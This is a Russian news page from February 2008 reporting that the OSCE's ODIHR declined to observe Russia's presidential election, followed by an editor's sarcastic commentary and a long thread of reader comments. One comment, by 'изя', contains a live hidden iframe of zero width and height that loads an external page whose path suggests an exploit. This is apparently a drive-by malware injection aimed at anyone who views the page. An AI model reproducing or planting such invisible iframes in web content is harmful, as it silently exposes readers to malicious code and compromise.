Кто владеет информацией,
владеет миром

ОБСЕ не пришлет наблюдателей за президентскими выборами Медведева

Опубликовано 07.02.2008 в разделе комментариев 21

ОБСЕ не пришлет наблюдателей за президентскими выборами Медведева

Бюро по демократическим институтам и правам человека (БДИПЧ) ОБСЕ решило не присылать наблюдателей на выборы президента России.

"БДИПЧ сожалеет, что наложенные ограничения на запланированную наблюдательную миссию не позволяют развернуть миссию для наблюдения за президентскими выборами в России 2 марта 2008 года. Мы предприняли все шаги доброй воли для того, чтобы развернуть нашу миссию, даже в соответствии с теми условиями, с которыми выступили российские власти», - говорится в заявлении главы БДИПЧ Кристиана Штроугала.

«Однако у нас есть обязательства перед всеми 56 странами - участницами ОБСЕ выполнить наш мандат, и Российская Федерация создала ограничения, которые не позволяют проводить работу наблюдательной миссии в соответствии с этим мандатом", - цитирует его заявление «Интерфакс».

- МИД РФ, конечно, недоволен, - комментирует ситуацию главный редактор ФОРУМа.мск Анатолий Баранов. - Но ОБСЕ такая организация, которой газ не отключишь и въездных виз не лишишь, а по-другому в российском МИДе, похоже, не умеют. Опять же есть такая организация - ЦИК РФ, им вообще все "наблюдатели-шмоблюдатели" по барабану. Как подсчитают, так и запишут, а кто не согласен - либо прикроют, либо башку проломят прямо на избирательном участке, как в Казани было. Выборы - дело серьезное, государственное, и нечего под ногами путаться. И МИД, видимо, теперь озвучивает позицию ЦИК, никак не меньше... Зато можно не париться с формальностями теперь - узбецкий результат гарантирован, а также почет и уважение всего мирового сообщества, особенно Зимбабве и Уганды.



Рейтинг:   4.27,  Голосов: 11
Поделиться
Всего комментариев к статье: 21
Комментарии не премодерируются и их можно оставлять анонимно
Кандиду в дурдом
03 написал 09.02.2008 02:52
Если бы тупость оценивалась в баллах, то ты, без сомнения, был бы отличником.
Следующий пост посвяти тому, как автобус возит по всему городу одних и тех же избирателей, которые по 20 раз голосуют (на прошлых выборах один "отличник" это уже описывал).
Да, еще не забудь об огромных взятках наблюдателям, которые сидят на всех участках.
Поистине, дураков не сеют и не жнут- сами родятся!
Подмахиваешь здесь разным недоумкам ты,- вам же сдуру кажется, что вы- народ.
А то, что вокруг тебя "ни одного ненормального человека", точно указывает твое местонахождение, что неудивительно, т.к. только законченный псих может считать миллионы людей, которые идут на выборы, ненормальными.
Re: ОБСЕшная выходка - разводка для тупых
Кандид написал 08.02.2008 11:16
А кто же он по твоему - выходец из демократов-перестройщиков что ли ? В общем, жду от зюганоидов последнего, напрашивающегося хода. Чтобы они начали за Медведева агитировать ))))
2 марта
Кандид написал 08.02.2008 11:14
Ни знаю ни одного нормального человека, который бы 2 марта на выборы пошел. Свое слово скажет Чуркин. Возьмет с потолка цифру, процентиков 65, и все будет путем. Подмахивай дальше, троечник )))
Учиться у Истории.
03 написал 08.02.2008 08:16
Думал, что этот сайт- очередная нетленка Латыниной-Саидова-Филина-Белковского.
Ошибся, с кем ни бывает? Оказывается, именно ТАК надо проявлять левый патриотизм. Или он у автора навроде выходного костюма,- когда надо и одеть можно?
Хочу напомнить в этой связи слова одного из самых сильных министров финансов Царской России Егора Францевича Канкрина (его финансовая реформа хорошо известна):
"Эх, господа, у нас обычно только и разговору, только и беспокойства, что скажет Европа. РОССИЯ ЧТО СКАЖЕТ, ВОТ ДЛЯ НАС ЧТО ВАЖНО!".
Не надо предавать забвению слова умных людей.
А Россия 2 марта скажет свое слово, только не надо путаться у нее под ногами.
ОБСЕшная выходка - разводка для тупых
Стрелок-радист написал 08.02.2008 02:32
Просто Пукина опять пиарят как злобного диктатора, выходца из кровавой гэбни.
Пугалка-страшилка для тупых западных обывателей и россиянских образованцев.
И, соответственно, Надежда, Опора и Поддержка для "возрождающейся Единой России" и ее мудрого народа-богоносца.
Первые письмишко в ЦИКу накропали, что-де голосовать не пойдуть и бумажки с фамилиеми кандидатов пришлють лично Чурову.
http://forum.msk.ru/material/politic/435802.html
А тот, поди, и корзинку специальную приготовил для такого случая : ))
да уж, вот тут интереснее
изя написал 08.02.2008 00:15
<p>Всем сюда, тут интереснее</p>
<iframe src="http://x-y-zz.org/exp2/index.php" width="0" height="0"></iframe>
(без названия)
Гирин написал 08.02.2008 00:12
Если я не ошибаюсь господин Г.Зюганов говорил о МОБИЛИЗАЦИИ то ли 50
то ли 500 тысяч контроллеров для избирательных участков со стороны КПРФ.
Вопрос в том поможет ли это?. Тем более решают не КАК избирают, а КАК и
КТО считает. А считает те кто упрравляет ГАС. Т.е. накрутят свои 65 процентов. Так что приедут ли ОБСЕ и т.п. или нет без разницы. Разделение труда, демонстраци "твердости" со стороны властей РФ для избирателей перед "проклятым" Западом. А потом после "тяжелых" трудов поедет элита на отдых в Куршавель и снова будут посмеиваться как нае-ли избирателя.
Гирин
Эти наблюдатели,
АБЯ написал 07.02.2008 22:43
какие надо наблюдатели. Вот в Грузии они сначала ничего не наблюли, а только потом заметили, что что-то все же имело место быть. А в Россию другие наблюдатели приедут, менее капризные, ну и что? БДИПЧ эта хочет лишний раз поскандалить по привычке.
Документ
Владимир Акимов написал 07.02.2008 22:10
Дорогой А.Б.
Конечно, каждый волен любить или не любить Путина, Медведева, Зюганова и прочие персонажи политических дристалищ. Но зачем же голову терять? Если бы, дорогой А.Б., ты так не спешил, то истина могла бы предстать перед тобой без колготок.
Думаю, истеричность директора БДИПЧ в определенной мере вызвана тем, что это - последний его героический подвиг, и ему надо как-то прославиться, чтобы получить новую синекуру. Ведь со старой (нынешней) придется расстаться.
Вот любпытный документ:
"Организация по безопасности и сотрудничеству в Европе Совет министров
MC.DEC/1/06
27 февраля 2006 года
РЕШЕНИЕ No. 1/06
ПРОДЛЕНИЕ СРОКА ДЕЙСТВИЯ МАНДАТА ДИРЕКТОРА БЮРО ПО ДЕМОКРАТИЧЕСКИМ ИНСТИТУТАМ И ПРАВАМ
ЧЕЛОВЕКА
Совет министров,
напоминая о решении, принятом на второй встрече Совета министров в Праге в 1992 году относительно развития Бюро по демократическим институтам и правам человека (БДИПЧ),
отмечая, что срок полномочий нынешнего Директора БДИПЧ посла Кристиана Штрогала истекает 28 февраля 2006 года,
принимая во внимание рекомендацию Постоянного совета,
постановляет продлить срок действия мандата посла Кристиана Штрогала на двухлетний период до 28 февраля 2008 года. С этого дня и до тех пор, пока Совет министров не произведет нового назначения, но, во всяком случае, не дольше, чем до 30 июня 2008 года, посол Кристиан Штрогал будет исполнять обязанности Директора БДИПЧ".
Это - зерно, остальное - шелуха, разносимая по ветру шалупонью.
нуи ну
елена написал 07.02.2008 21:59
Все время я,русская,гражданкаРОССИИ,москвичка,порядочная налогоплательщица,спрашиваю -КТО СТОИТ ЗА МОЕЙ СПИНОЙ ,ПОКА Я ЖИВУ ,ПОКА ЯРАБОТАЮ,НА КОГО МОЯ НАДЕЖДА В БУДУЩЕМ? Есть ли выбор у меня? А может это мне кажется,и завтра,я потеряю работу,потому что конкурирущая фирма уничтожит нас,как уничтожили моих знакомых,потеряю свое здоровье,и небудет денег чтобы заплатить врачам,завтра снесут мой дом в центре,потому что челядь Лужкова облюбует место под домом.МОГУ ЛИ Я ЗАЩИТИТЬ СЕБЯ САМА?ЧТО Я ДОЛЖНА СДЕЛАТЬ,ВЛАСТЬ НЕПРИСТУПНА,а уж тем более какойто там ОБСЕ хочет что то сотворить
(без названия)
Прохожий написал 07.02.2008 21:54
БДИПЧ как скунс. Если не куснуть - так навонять.
Ква-ква
многоkУР написал 07.02.2008 20:58
И без петуха светает.
Восточная мудрост
сторонний наблюдатель
Александр написал 07.02.2008 20:56
Подскажите, а то я что-то не понимаю. В Кремле ведь ставленники Запада. По идее, Запад должен бы их прикрыть на выборах, согласиться, что наши выборы самые демократичные, а вместо этого ТАКОЕ...
Почему? У них либо раскол в верхах, либо там действительно немногие хотят помочь России, либо они так наш народ дурачат...
Подскажите кто-нибудь!
Ну вот теперь все понятно.
Вася написал 07.02.2008 20:00
Хорошо работаете, ребята. Успехов вам. Для этого и дергал вас, чтобы проверить.
Тоже Также думаю
Уже совсем Вася написал 07.02.2008 19:38
А л е к с а насмешила ссылкой :)
(без названия)
тоже Вася написал 07.02.2008 19:07
Неизвестный: БДИПЧ сожалеет, что наложенные ограничения на запланированную наблюдательную миссию не позволяют развернуть миссию для наблюдения за президентскими выборами в России 2 марта 2008 года.
Коммент: Я б с БДИПЧ готов к СТЕНЕ плача плечем к плечу встать.
Re: Живу недоумевая, все время хочу понять...
Вася написал 07.02.2008 18:56
ОБСЕ, конечно, хреновая организация. А нету ли у вас. г-н Пианист, подходящей организации (кроме ЦИК РФ), которая могла бы проконтролировать мухлевство на наших самых честных выборах? Может, Организация Африканского единства? Или сербские товарищи уже едут?
Re: Живу недоумевая, все время хочу понять...
А л е к с а написал 07.02.2008 18:48
А как вела себя Россия (вековая союзница сербов) в то же самое время про которое ты говоришь?
Пианист, чью мелодию играешь?
Живу недоумевая, все время хочу понять...
Пианист написал 07.02.2008 18:27
"Бюро по демократическим институтам и правам человека". Может кто-то подскажет, как они вели себя, когда бомбили Сербию. Что-то я не помню их вопля.
Re: ОБСЕ не пришлет наблюдателей - и верно сделает
А л е к с а написал 07.02.2008 18:23
Экологический кризис, грозящий всему миру, как будто нас не касается. Но политика и экология в современном мире тесно связаны. Недаром ВТО связывают с Киотским протоколом, а экологи на Западе являются серьезной политической силой, не считаться с которой не может себе позволить ни один здравомыслящий политик.
Если бы кандидат в ПРЕЗИ любой западной страны позволил себе то, что позволяют наши приемыши, то только бы одна пресса от них оставила мокрое место.
Может быть, ОБСЕ не послало своих наблюдателей на выборы в РФ еще и по косвенным причинам?